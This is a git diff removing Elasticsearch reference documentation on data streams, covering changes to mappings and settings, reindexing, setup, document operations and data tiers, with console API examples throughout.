steps: - -. Update the index template used by the data stream. This ensures the new -field mapping is added to future backing indices created for the stream. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request adds a mapping -for a new field, `message`, to the template. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "mappings": { - "properties": { - "message": { <1> - "type": "text" - } - } - } - } -} ----- -<1> Adds a mapping for the new `message` field. --- - -. 
Use the <> to add the new field mapping -to the data stream. By default, this adds the mapping to the stream's existing -backing indices, including the write index. -+ --- -The following put mapping API request adds the new `message` field mapping to -`my-data-stream`. - -[source,console] ----- -PUT /my-data-stream/_mapping -{ - "properties": { - "message": { - "type": "text" - } - } -} ----- --- -+ -To add the mapping only to the stream's write index, set the put mapping API's -`write_index_only` query parameter to `true`. -+ --- -The following put mapping request adds the new `message` field mapping only to -`my-data-stream`'s write index. The new field mapping is not added to -the stream's other backing indices. - -[source,console] ----- -PUT /my-data-stream/_mapping?write_index_only=true -{ - "properties": { - "message": { - "type": "text" - } - } -} ----- --- - -[discrete] -[[change-existing-field-mapping-in-a-data-stream]] -=== Change an existing field mapping in a data stream - -The documentation for each <> indicates -whether you can update it for an existing field using the -<>. To update these parameters for an -existing field, follow these steps: - -. Update the index template used by the data stream. This ensures the updated -field mapping is added to future backing indices created for the stream. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request changes the -argument for the `host.ip` field's <> -mapping parameter to `true`. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "mappings": { - "properties": { - "host": { - "properties": { - "ip": { - "type": "ip", - "ignore_malformed": true <1> - } - } - } - } - } - } -} ----- -<1> Changes the `host.ip` field's `ignore_malformed` value to `true`. --- - -. Use the <> to apply the mapping changes -to the data stream. By default, this applies the changes to the stream's -existing backing indices, including the write index. -+ --- -The following <> request targets -`my-data-stream`. The request changes the argument for the `host.ip` -field's `ignore_malformed` mapping parameter to `true`. - -[source,console] ----- -PUT /my-data-stream/_mapping -{ - "properties": { - "host": { - "properties": { - "ip": { - "type": "ip", - "ignore_malformed": true - } - } - } - } -} ----- --- -+ -To apply the mapping changes only to the stream's write index, set the put -mapping API's `write_index_only` query parameter to `true`. -+ --- -The following put mapping request changes the `host.ip` field's mapping only for -`my-data-stream`'s write index. The change is not applied to the -stream's other backing indices. - -[source,console] ----- -PUT /my-data-stream/_mapping?write_index_only=true -{ - "properties": { - "host": { - "properties": { - "ip": { - "type": "ip", - "ignore_malformed": true - } - } - } - } -} ----- --- - -Except for supported mapping parameters, we don't recommend you change the -mapping or field data type of existing fields, even in a data stream's matching -index template or its backing indices. Changing the mapping of an existing -field could invalidate any data that’s already indexed. - -If you need to change the mapping of an existing field, create a new -data stream and reindex your data into it. See -<>. 
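Whichever approach you use, you can verify the outcome with the get mapping API. Querying the data stream returns the mappings of each backing index, so you can confirm which indices received the change:

[source,console]
----
GET /my-data-stream/_mapping
----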
- -[discrete] -[[change-dynamic-index-setting-for-a-data-stream]] -=== Change a dynamic index setting for a data stream - -To change a <> for a data stream, -follow these steps: - -. Update the index template used by the data stream. This ensures the setting is -applied to future backing indices created for the stream. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request changes the -template's `index.refresh_interval` index setting to `30s` (30 seconds). - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "settings": { - "index.refresh_interval": "30s" <1> - } - } -} ----- -<1> Changes the `index.refresh_interval` setting to `30s` (30 seconds). --- - -. Use the <> to update the -index setting for the data stream. By default, this applies the setting to -the stream's existing backing indices, including the write index. -+ --- -The following update index settings API request updates the -`index.refresh_interval` setting for `my-data-stream`. - -[source,console] ----- -PUT /my-data-stream/_settings -{ - "index": { - "refresh_interval": "30s" - } -} ----- --- - -[discrete] -[[change-static-index-setting-for-a-data-stream]] -=== Change a static index setting for a data stream - -<> can only be set when a backing -index is created. You cannot update static index settings using the -<>. - -To apply a new static setting to future backing indices, update the index -template used by the data stream. The setting is automatically applied to any -backing index created after the update. - -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> requests adds new -`sort.field` and `sort.order index` settings to the template. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "settings": { - "sort.field": [ "@timestamp"], <1> - "sort.order": [ "desc"] <2> - } - } -} ----- -<1> Adds the `sort.field` index setting. -<2> Adds the `sort.order` index setting. - -If wanted, you can <> to immediately apply the setting to the data stream’s write index. This -affects any new data added to the stream after the rollover. However, it does -not affect the data stream's existing backing indices or existing data. - -To apply static setting changes to existing backing indices, you must create a -new data stream and reindex your data into it. See -<>. - -[discrete] -[[data-streams-use-reindex-to-change-mappings-settings]] -=== Use reindex to change mappings or settings - -You can use a reindex to change the mappings or settings of a data stream. This -is often required to change the data type of an existing field or update static -index settings for backing indices. - -To reindex a data stream, first create or update an index template so that it -contains the wanted mapping or setting changes. You can then reindex the -existing data stream into a new stream matching the template. This applies the -mapping and setting changes in the template to each document and backing index -added to the new data stream. These changes also affect any future backing -index created by the new stream. - -Follow these steps: - -. Choose a name or index pattern for a new data stream. This new data -stream will contain data from your existing stream. 
-+ -You can use the resolve index API to check if the name or pattern matches any -existing indices, index aliases, or data streams. If so, you should consider -using another name or pattern. --- -The following resolve index API request checks for any existing indices, index -aliases, or data streams that start with `new-data-stream`. If not, the -`new-data-stream*` index pattern can be used to create a new data stream. - -[source,console] ----- -GET /_resolve/index/new-data-stream* ----- - -The API returns the following response, indicating no existing targets match -this pattern. - -[source,console-result] ----- -{ - "indices": [ ], - "aliases": [ ], - "data_streams": [ ] -} ----- -// TESTRESPONSE[s/"data_streams": \[ \]/"data_streams": $body.data_streams/] --- - -. Create or update an index template. This template should contain the -mappings and settings you'd like to apply to the new data stream's backing -indices. -+ -This index template must meet the -<>. It -should also contain your previously chosen name or index pattern in the -`index_patterns` property. -+ -TIP: If you are only adding or changing a few things, we recommend you create a -new template by copying an existing one and modifying it as needed. -+ --- -For example, `my-data-stream-template` is an existing index template used by -`my-data-stream`. - -The following <> request creates a new -index template, `new-data-stream-template`. `new-data-stream-template` -uses `my-data-stream-template` as its basis, with the following -changes: - -* The index pattern in `index_patterns` matches any index or data stream - starting with `new-data-stream`. -* The `@timestamp` field mapping uses the `date_nanos` field data type rather - than the `date` data type. -* The template includes `sort.field` and `sort.order` index settings, which were - not in the original `my-data-stream-template` template. - -[source,console] ----- -PUT /_index_template/new-data-stream-template -{ - "index_patterns": [ "new-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "mappings": { - "properties": { - "@timestamp": { - "type": "date_nanos" <1> - } - } - }, - "settings": { - "sort.field": [ "@timestamp"], <2> - "sort.order": [ "desc"] <3> - } - } -} ----- -<1> Changes the `@timestamp` field mapping to the `date_nanos` field data type. -<2> Adds the `sort.field` index setting. -<3> Adds the `sort.order` index setting. --- - -. Use the <> to manually -create the new data stream. The name of the data stream must match the index -pattern defined in the new template's `index_patterns` property. -+ -We do not recommend <>. Later, you will reindex older data from an -existing data stream into this new stream. This could result in one or more -backing indices that contains a mix of new and old data. -+ -[[data-stream-mix-new-old-data]] -.Mixing new and old data in a data stream -[IMPORTANT] -==== -While mixing new and old data is safe, it could interfere with data retention. -If you delete older indices, you could accidentally delete a backing index that -contains both new and old data. To prevent premature data loss, you would need -to retain such a backing index until you are ready to delete its newest data. -==== -+ --- -The following create data stream API request targets `new-data-stream`, which -matches the index pattern for `new-data-stream-template`. -Because no existing index or data stream uses this name, this request creates -the `new-data-stream` data stream. 
- -[source,console] ----- -PUT /_data_stream/new-data-stream ----- -// TEST[s/new-data-stream/new-data-stream-two/] --- - -. If you do not want to mix new and old data in your new data stream, pause the -indexing of new documents. While mixing old and new data is safe, it could -interfere with data retention. See <>. - -. If you use {ilm-init} to <>, reduce the {ilm-init} poll interval. This ensures the current write -index doesn’t grow too large while waiting for the rollover check. By default, -{ilm-init} checks rollover conditions every 10 minutes. -+ --- -The following <> request -lowers the `indices.lifecycle.poll_interval` setting to `1m` (one minute). - -[source,console] ----- -PUT /_cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": "1m" - } -} ----- --- - -. Reindex your data to the new data stream using an `op_type` of `create`. -+ -If you want to partition the data in the order in which it was originally -indexed, you can run separate reindex requests. These reindex requests can use -individual backing indices as the source. You can use the -<> to retrieve a list of backing -indices. -+ --- -For example, you plan to reindex data from `my-data-stream` into -`new-data-stream`. However, you want to submit a separate reindex request for -each backing index in `my-data-stream`, starting with the oldest backing index. -This preserves the order in which the data was originally indexed. - -The following get data stream API request retrieves information about -`my-data-stream`, including a list of its backing indices. - -[source,console] ----- -GET /_data_stream/my-data-stream ----- - -The API returns the following response. Note the `indices` property contains an -array of the stream's current backing indices. The first item in the array -contains information about the stream's oldest backing index, -`.ds-my-data-stream-000001`. - -[source,console-result] ----- -{ - "data_streams": [ - { - "name": "my-data-stream", - "timestamp_field": { - "name": "@timestamp" - }, - "indices": [ - { - "index_name": ".ds-my-data-stream-000001", <1> - "index_uuid": "Gpdiyq8sRuK9WuthvAdFbw" - }, - { - "index_name": ".ds-my-data-stream-000002", - "index_uuid": "_eEfRrFHS9OyhqWntkgHAQ" - } - ], - "generation": 2, - "status": "GREEN", - "template": "my-data-stream-template" - } - ] -} ----- -// TESTRESPONSE[s/"index_uuid": "Gpdiyq8sRuK9WuthvAdFbw"/"index_uuid": $body.data_streams.0.indices.0.index_uuid/] -// TESTRESPONSE[s/"index_uuid": "_eEfRrFHS9OyhqWntkgHAQ"/"index_uuid": $body.data_streams.0.indices.1.index_uuid/] -// TESTRESPONSE[s/"status": "GREEN"/"status": "YELLOW"/] - -<1> First item in the `indices` array for `my-data-stream`. This -item contains information about the stream's oldest backing index, -`.ds-my-data-stream-000001`. - -The following <> request copies documents from -`.ds-my-data-stream-000001` to `new-data-stream`. Note the request's `op_type` -is `create`. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": ".ds-my-data-stream-000001" - }, - "dest": { - "index": "new-data-stream", - "op_type": "create" - } -} ----- --- -+ -You can also use a query to reindex only a subset of documents with each -request. -+ --- -The following <> request copies documents from -`my-data-stream` to `new-data-stream`. The request -uses a <> to only reindex documents with a -timestamp within the last week. Note the request's `op_type` is `create`. 
- -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my-data-stream", - "query": { - "range": { - "@timestamp": { - "gte": "now-7d/d", - "lte": "now/d" - } - } - } - }, - "dest": { - "index": "new-data-stream", - "op_type": "create" - } -} ----- --- - -. If you previously changed your {ilm-init} poll interval, change it back to its -original value when reindexing is complete. This prevents unnecessary load on -the master node. -+ --- -The following update cluster settings API request resets the -`indices.lifecycle.poll_interval` setting to its default value, 10 minutes. - -[source,console] ----- -PUT /_cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": null - } -} ----- --- - -. Resume indexing using the new data stream. Searches on this stream will now -query your new data and the reindexed data. - -. Once you have verified that all reindexed data is available in the new -data stream, you can safely remove the old stream. -+ --- -The following <> request -deletes `my-data-stream`. This request also deletes the stream's -backing indices and any data they contain. - -[source,console] ----- -DELETE /_data_stream/my-data-stream ----- --- diff --git a/docs/reference/data-streams/data-stream-apis.asciidoc b/docs/reference/data-streams/data-stream-apis.asciidoc deleted file mode 100644 index 04a5a281c22..00000000000 --- a/docs/reference/data-streams/data-stream-apis.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[role="xpack"] -[[data-stream-apis]] -== Data stream APIs - -The following APIs are available for managing <>: - -* <> -* <> -* <> -* <> - -For concepts and tutorials, see <>. - -include::{es-repo-dir}/indices/create-data-stream.asciidoc[] - -include::{es-repo-dir}/indices/delete-data-stream.asciidoc[] - -include::{es-repo-dir}/indices/get-data-stream.asciidoc[] - -include::{es-repo-dir}/indices/data-stream-stats.asciidoc[] \ No newline at end of file diff --git a/docs/reference/data-streams/data-streams.asciidoc b/docs/reference/data-streams/data-streams.asciidoc deleted file mode 100644 index 96e7ab26f72..00000000000 --- a/docs/reference/data-streams/data-streams.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[role="xpack"] -[[data-streams]] -= Data streams -++++ -Data streams -++++ - -A data stream lets you store append-only time series -data across multiple indices while giving you a single named resource for -requests. Data streams are well-suited for logs, events, metrics, and other -continuously generated data. - -You can submit indexing and search requests directly to a data stream. The -stream automatically routes the request to backing indices that store the -stream's data. You can use <> to -automate the management of these backing indices. For example, you can use -{ilm-init} to automatically move older backing indices to less expensive -hardware and delete unneeded indices. {ilm-init} can help you reduce costs and -overhead as your data grows. - -[discrete] -[[backing-indices]] -== Backing indices - -A data stream consists of one or more <>, auto-generated -backing indices. - -image::images/data-streams/data-streams-diagram.svg[align="center"] - -Each data stream requires a matching <>. The -template contains the mappings and settings used to configure the stream's -backing indices. - -Every document indexed to a data stream must contain a `@timestamp` field, -mapped as a <> or <> field type. If the -index template doesn't specify a mapping for the `@timestamp` field, {es} maps -`@timestamp` as a `date` field with default options. 
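For example, a minimal index template for a hypothetical `my-logs*` stream could map `@timestamp` explicitly as `date_nanos` instead of relying on that default. The template name and index pattern below are placeholders:

[source,console]
----
PUT /_index_template/my-logs-template
{
  "index_patterns": [ "my-logs*" ],
  "data_stream": { },
  "template": {
    "mappings": {
      "properties": {
        "@timestamp": { "type": "date_nanos" }
      }
    }
  }
}
----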
- -The same index template can be used for multiple data streams. You cannot -delete an index template in use by a data stream. - -[discrete] -[[data-stream-read-requests]] -== Read requests - -When you submit a read request to a data stream, the stream routes the request -to all its backing indices. - -image::images/data-streams/data-streams-search-request.svg[align="center"] - -[discrete] -[[data-stream-write-index]] -== Write index - -The most recently created backing index is the data stream’s write index. -The stream adds new documents to this index only. - -image::images/data-streams/data-streams-index-request.svg[align="center"] - -You cannot add new documents to other backing indices, even by sending requests -directly to the index. - -You also cannot perform operations on a write index that may hinder indexing, -such as: - -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[data-streams-rollover]] -== Rollover - -When you create a data stream, {es} automatically creates a backing index for -the stream. This index also acts as the stream's first write index. A -<> creates a new backing index that becomes the -stream's new write index. - -We recommend using <> to automatically -roll over data streams when the write index reaches a specified age or size. -If needed, you can also <> -a data stream. - - -[discrete] -[[data-streams-generation]] -== Generation - -Each data stream tracks its generation: a six-digit, zero-padded integer that -acts as a cumulative count of the stream's rollovers, starting at `000001`. - -When a backing index is created, the index is named using the following -convention: - -[source,text] ----- -.ds-- ----- - -Backing indices with a higher generation contain more recent data. For example, -the `web-server-logs` data stream has a generation of `34`. The stream's most -recent backing index is named `.ds-web-server-logs-000034`. - -Some operations, such as a <> or -<>, can change a backing index's name. -These name changes do not remove a backing index from its data stream. - -[discrete] -[[data-streams-append-only]] -== Append-only - -Data streams are designed for use cases where existing data is rarely, -if ever, updated. You cannot send update or deletion requests for existing -documents directly to a data stream. Instead, use the -<> and -<> APIs. - -If needed, you can <> by submitting requests directly to the document's backing index. - -TIP: If you frequently update or delete existing documents, use an -<> and <> -instead of a data stream. You can still use -<> to manage indices for the alias. - -include::set-up-a-data-stream.asciidoc[] -include::use-a-data-stream.asciidoc[] -include::change-mappings-and-settings.asciidoc[] diff --git a/docs/reference/data-streams/set-up-a-data-stream.asciidoc b/docs/reference/data-streams/set-up-a-data-stream.asciidoc deleted file mode 100644 index 09b8f9c0f02..00000000000 --- a/docs/reference/data-streams/set-up-a-data-stream.asciidoc +++ /dev/null @@ -1,227 +0,0 @@ -[role="xpack"] -[[set-up-a-data-stream]] -== Set up a data stream - -To set up a data stream, follow these steps: - -. <>. -. <>. -. <>. -. <>. - -[discrete] -[[configure-a-data-stream-ilm-policy]] -=== Optional: Configure an {ilm-init} lifecycle policy - -While optional, we recommend you configure an <> to automate the management of your data stream's backing -indices. - -In {kib}, open the menu and go to *Stack Management > Index Lifecycle Policies*. -Click *Index Lifecycle Policies*. 
- -[role="screenshot"] -image::images/ilm/create-policy.png[Index Lifecycle Policies page] - -[%collapsible] -.API example -==== -Use the <> to configure a policy: - -[source,console] ----- -PUT /_ilm/policy/my-data-stream-policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} ----- -==== - -[discrete] -[[create-a-data-stream-template]] -=== Create an index template - -. In {kib}, open the menu and go to *Stack Management > Index Management*. -. In the *Index Templates* tab, click *Create template*. -. In the Create template wizard, use the *Data stream* toggle to indicate the -template is used for data streams. -. Use the wizard to finish defining your template. Specify: - -* One or more index patterns that match the data stream's name. - -* Mappings and settings for the stream's backing indices. - -* A priority for the index template -+ -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and -`synthetics-*-*` index patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. - -If you use {agent}, assign your index templates a priority lower than `100` to -avoid overriding the built-in templates. Otherwise, use a non-overlapping index -pattern or assign templates with an overlapping pattern a `priority` higher than -`100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -If the index template doesn't specify a mapping for the `@timestamp` field, {es} -maps `@timestamp` as a `date` field with default options. - -If using {ilm-init}, specify your lifecycle policy in the `index.lifecycle.name` -setting. - -TIP: Carefully consider your template's mappings and settings. Later changes may -require reindexing. See <>. - -[role="screenshot"] -image::images/data-streams/create-index-template.png[Create template page] - -[%collapsible] -.API example -==== -Use the <> to create an index -template. The template must include an empty `data_stream` object, indicating -it's used for data streams. - -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 200, - "template": { - "settings": { - "index.lifecycle.name": "my-data-stream-policy" - } - } -} ----- -// TEST[continued] -==== - -[discrete] -[[create-a-data-stream]] -=== Create the data stream - -To automatically create the data stream, submit an -<> to the stream. The stream's -name must match one of your template's index patterns. - -[source,console] ----- -POST /my-data-stream/_doc/ -{ - "@timestamp": "2020-12-06T11:04:05.000Z", - "user": { - "id": "vlb44hny" - }, - "message": "Login attempt failed" -} ----- -// TEST[continued] - -You can also use the <> to -manually create the data stream. The stream's name must match one of your -template's index patterns. - -[source,console] ----- -PUT /_data_stream/my-data-stream ----- -// TEST[continued] -// TEST[s/my-data-stream/my-data-stream-alt/] - -[discrete] -[[secure-a-data-stream]] -=== Secure the data stream - -To control access to the data stream and its -data, use <>. 
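As a rough sketch, the following create or update roles API request grants read-only access to `my-data-stream`. The role name and privilege list are placeholders; adapt them to your own security model.

[source,console]
----
PUT /_security/role/my-data-stream-reader
{
  "indices": [
    {
      "names": [ "my-data-stream" ],
      "privileges": [ "read", "view_index_metadata" ]
    }
  ]
}
----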
- -[discrete] -[[get-info-about-a-data-stream]] -=== Get information about a data stream - -In {kib}, open the menu and go to *Stack Management > Index Management*. In the -*Data Streams* tab, click the data stream's name. - -[role="screenshot"] -image::images/data-streams/data-streams-list.png[Data Streams tab] - -[%collapsible] -.API example -==== -Use the <> to retrieve information -about one or more data streams: - -//// -[source,console] ----- -POST /my-data-stream/_rollover/ ----- -// TEST[continued] -//// - -[source,console] ----- -GET /_data_stream/my-data-stream ----- -// TEST[continued] -==== - -[discrete] -[[delete-a-data-stream]] -=== Delete a data stream - -To delete a data stream and its backing indices, open the {kib} menu and go to -*Stack Management > Index Management*. In the *Data Streams* tab, click the -trash can icon. - -[role="screenshot"] -image::images/data-streams/data-streams-list.png[Data Streams tab] - -[%collapsible] -.API example -==== -Use the <> to delete a data -stream and its backing indices: - -[source,console] ----- -DELETE /_data_stream/my-data-stream ----- -// TEST[continued] -==== - -//// -[source,console] ----- -DELETE /_data_stream/* -DELETE /_index_template/* -DELETE /_ilm/policy/my-data-stream-policy ----- -// TEST[continued] -//// diff --git a/docs/reference/data-streams/use-a-data-stream.asciidoc b/docs/reference/data-streams/use-a-data-stream.asciidoc deleted file mode 100644 index 544cc32d31f..00000000000 --- a/docs/reference/data-streams/use-a-data-stream.asciidoc +++ /dev/null @@ -1,351 +0,0 @@ -[role="xpack"] -[[use-a-data-stream]] -== Use a data stream - -After you <>, you can do -the following: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -//// -[source,console] ----- -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { } -} - -PUT /_data_stream/my-data-stream - -POST /my-data-stream/_rollover/ - -POST /my-data-stream/_rollover/ - -PUT /my-data-stream/_create/bfspvnIBr7VVZlfp2lqX?refresh=wait_for -{ - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "yWIumJd7" - }, - "message": "Login successful" -} ----- -// TESTSETUP - -[source,console] ----- -DELETE /_data_stream/* - -DELETE /_index_template/* ----- -// TEARDOWN -//// - -[discrete] -[[add-documents-to-a-data-stream]] -=== Add documents to a data stream - -To add an individual document, use the <>. -<> are supported. - -[source,console] ----- -POST /my-data-stream/_doc/ -{ - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "8a4f500d" - }, - "message": "Login successful" -} ----- - -You cannot add new documents to a data stream using the index API's `PUT -//_doc/<_id>` request format. To specify a document ID, use the `PUT -//_create/<_id>` format instead. Only an -<> of `create` is supported. - -To add multiple documents with a single request, use the <>. -Only `create` actions are supported. 
- -[source,console] ----- -PUT /my-data-stream/_bulk?refresh -{"create":{ }} -{ "@timestamp": "2020-12-08T11:04:05.000Z", "user": { "id": "vlb44hny" }, "message": "Login attempt failed" } -{"create":{ }} -{ "@timestamp": "2020-12-08T11:06:07.000Z", "user": { "id": "8a4f500d" }, "message": "Login successful" } -{"create":{ }} -{ "@timestamp": "2020-12-09T11:07:08.000Z", "user": { "id": "l7gk7f82" }, "message": "Logout successful" } ----- - -[discrete] -[[search-a-data-stream]] -=== Search a data stream - -The following search APIs support data streams: - -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[get-stats-for-a-data-stream]] -=== Get statistics for a data stream - -Use the <> to get -statistics for one or more data streams: - -[source,console] ----- -GET /_data_stream/my-data-stream/_stats?human=true ----- - -[discrete] -[[manually-roll-over-a-data-stream]] -=== Manually roll over a data stream - -Use the <> to manually -<> a data stream: - -[source,console] ----- -POST /my-data-stream/_rollover/ ----- - -[discrete] -[[open-closed-backing-indices]] -=== Open closed backing indices - -You cannot search a <> backing index, even by searching -its data stream. You also cannot <> -or <> documents in a closed index. - -To re-open a closed backing index, submit an <> directly to the index: - -[source,console] ----- -POST /.ds-my-data-stream-000001/_open/ ----- - -To re-open all closed backing indices for a data stream, submit an open index -API request to the stream: - -[source,console] ----- -POST /my-data-stream/_open/ ----- - -[discrete] -[[reindex-with-a-data-stream]] -=== Reindex with a data stream - -Use the <> to copy documents from an -existing index, index alias, or data stream to a data stream. Because data streams are -<>, a reindex into a data stream must use -an `op_type` of `create`. A reindex cannot update existing documents in a data -stream. 
- -//// -[source,console] ----- -PUT /_bulk?refresh=wait_for -{"create":{"_index" : "archive_1"}} -{ "@timestamp": "2020-12-08T11:04:05.000Z" } -{"create":{"_index" : "archive_2"}} -{ "@timestamp": "2020-12-08T11:06:07.000Z" } -{"create":{"_index" : "archive_2"}} -{ "@timestamp": "2020-12-09T11:07:08.000Z" } -{"create":{"_index" : "archive_2"}} -{ "@timestamp": "2020-12-09T11:07:08.000Z" } - -POST /_aliases -{ - "actions" : [ - { "add" : { "index" : "archive_1", "alias" : "archive" } }, - { "add" : { "index" : "archive_2", "alias" : "archive", "is_write_index" : true} } - ] -} ----- -//// - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "archive" - }, - "dest": { - "index": "my-data-stream", - "op_type": "create" - } -} ----- -// TEST[continued] - -[discrete] -[[update-docs-in-a-data-stream-by-query]] -=== Update documents in a data stream by query - -Use the <> to update documents in a -data stream that match a provided query: - -[source,console] ----- -POST /my-data-stream/_update_by_query -{ - "query": { - "match": { - "user.id": "l7gk7f82" - } - }, - "script": { - "source": "ctx._source.user.id = params.new_id", - "params": { - "new_id": "XgdX0NoX" - } - } -} ----- - -[discrete] -[[delete-docs-in-a-data-stream-by-query]] -=== Delete documents in a data stream by query - -Use the <> to delete documents in a -data stream that match a provided query: - -[source,console] ----- -POST /my-data-stream/_delete_by_query -{ - "query": { - "match": { - "user.id": "vlb44hny" - } - } -} ----- - -[discrete] -[[update-delete-docs-in-a-backing-index]] -=== Update or delete documents in a backing index - -If needed, you can update or delete documents in a data stream by sending -requests to the backing index containing the document. You'll need: - -* The <> -* The name of the backing index containing the document -* If updating the document, its <> - -To get this information, use a <>: - -[source,console] ----- -GET /my-data-stream/_search -{ - "seq_no_primary_term": true, - "query": { - "match": { - "user.id": "yWIumJd7" - } - } -} ----- - -Response: - -[source,console-result] ----- -{ - "took": 20, - "timed_out": false, - "_shards": { - "total": 3, - "successful": 3, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 0.2876821, - "hits": [ - { - "_index": ".ds-my-data-stream-000003", <1> - "_type": "_doc", - "_id": "bfspvnIBr7VVZlfp2lqX", <2> - "_seq_no": 0, <3> - "_primary_term": 1, <4> - "_score": 0.2876821, - "_source": { - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "yWIumJd7" - }, - "message": "Login successful" - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 20/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 0.2876821/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"_score": 0.2876821/"_score": $body.hits.hits.0._score/] - -<1> Backing index containing the matching document -<2> Document ID for the document -<3> Current sequence number for the document -<4> Primary term for the document - -To update the document, use an <> request with valid -`if_seq_no` and `if_primary_term` arguments: - -[source,console] ----- -PUT /.ds-my-data-stream-000003/_doc/bfspvnIBr7VVZlfp2lqX?if_seq_no=0&if_primary_term=1 -{ - "@timestamp": "2020-12-07T11:06:07.000Z", - "user": { - "id": "8a4f500d" - }, - "message": "Login successful" -} ----- - -To delete the document, use the <>: - -[source,console] ----- -DELETE /.ds-my-data-stream-000003/_doc/bfspvnIBr7VVZlfp2lqX ----- - -To delete or update 
multiple documents with a single request, use the -<>'s `delete`, `index`, and `update` actions. For `index` -actions, include valid <> arguments. - -[source,console] ----- -PUT /_bulk?refresh -{ "index": { "_index": ".ds-my-data-stream-000003", "_id": "bfspvnIBr7VVZlfp2lqX", "if_seq_no": 0, "if_primary_term": 1 } } -{ "@timestamp": "2020-12-07T11:06:07.000Z", "user": { "id": "8a4f500d" }, "message": "Login successful" } ----- - diff --git a/docs/reference/datatiers.asciidoc b/docs/reference/datatiers.asciidoc deleted file mode 100644 index 26c389dd6a0..00000000000 --- a/docs/reference/datatiers.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[role="xpack"] -[[data-tiers]] -== Data tiers - -A _data tier_ is a collection of nodes with the same data role that -typically share the same hardware profile: - -* <> nodes handle the indexing and query load for content such as a product catalog. -* <> nodes handle the indexing load for time series data such as logs or metrics -and hold your most recent, most-frequently-accessed data. -* <> nodes hold time series data that is accessed less-frequently -and rarely needs to be updated. -* <> nodes hold time series data that is accessed occasionally and not normally updated. - -When you index documents directly to a specific index, they remain on content tier nodes indefinitely. - -When you index documents to a data stream, they initially reside on hot tier nodes. -You can configure <> ({ilm-init}) policies -to automatically transition your time series data through the hot, warm, and cold tiers -according to your performance, resiliency and data retention requirements. - -A node's <> is configured in `elasticsearch.yml`. -For example, the highest-performance nodes in a cluster might be assigned to both the hot and content tiers: - -[source,yaml] --------------------------------------------------- -node.roles: ["data_hot", "data_content"] --------------------------------------------------- - -[discrete] -[[content-tier]] -=== Content tier - -Data stored in the content tier is generally a collection of items such as a product catalog or article archive. -Unlike time series data, the value of the content remains relatively constant over time, -so it doesn't make sense to move it to a tier with different performance characteristics as it ages. -Content data typically has long data retention requirements, and you want to be able to retrieve -items quickly regardless of how old they are. - -Content tier nodes are usually optimized for query performance--they prioritize processing power over IO throughput -so they can process complex searches and aggregations and return results quickly. -While they are also responsible for indexing, content data is generally not ingested at as high a rate -as time series data such as logs and metrics. From a resiliency perspective the indices in this -tier should be configured to use one or more replicas. - -New indices are automatically allocated to the <> unless they are part of a data stream. - -[discrete] -[[hot-tier]] -=== Hot tier - -The hot tier is the {es} entry point for time series data and holds your most-recent, -most-frequently-searched time series data. -Nodes in the hot tier need to be fast for both reads and writes, -which requires more hardware resources and faster storage (SSDs). -For resiliency, indices in the hot tier should be configured to use one or more replicas. - -New indices that are part of a <> are automatically allocated to the -hot tier. 
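To tie the hot tier into the lifecycle transitions described above, an {ilm-init} policy can roll over the stream's write index while data is hot and then age it into the later tiers. The following policy is only a sketch with made-up thresholds; choose rollover sizes, ages, and retention that match your own workload.

[source,console]
--------------------------------------------------
PUT /_ilm/policy/my-timeseries-policy
{
  "policy": {
    "phases": {
      "hot": {
        "actions": {
          "rollover": {
            "max_size": "25GB",
            "max_age": "7d"
          }
        }
      },
      "warm": {
        "min_age": "7d",
        "actions": {
          "forcemerge": {
            "max_num_segments": 1
          }
        }
      },
      "delete": {
        "min_age": "90d",
        "actions": {
          "delete": {}
        }
      }
    }
  }
}
--------------------------------------------------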
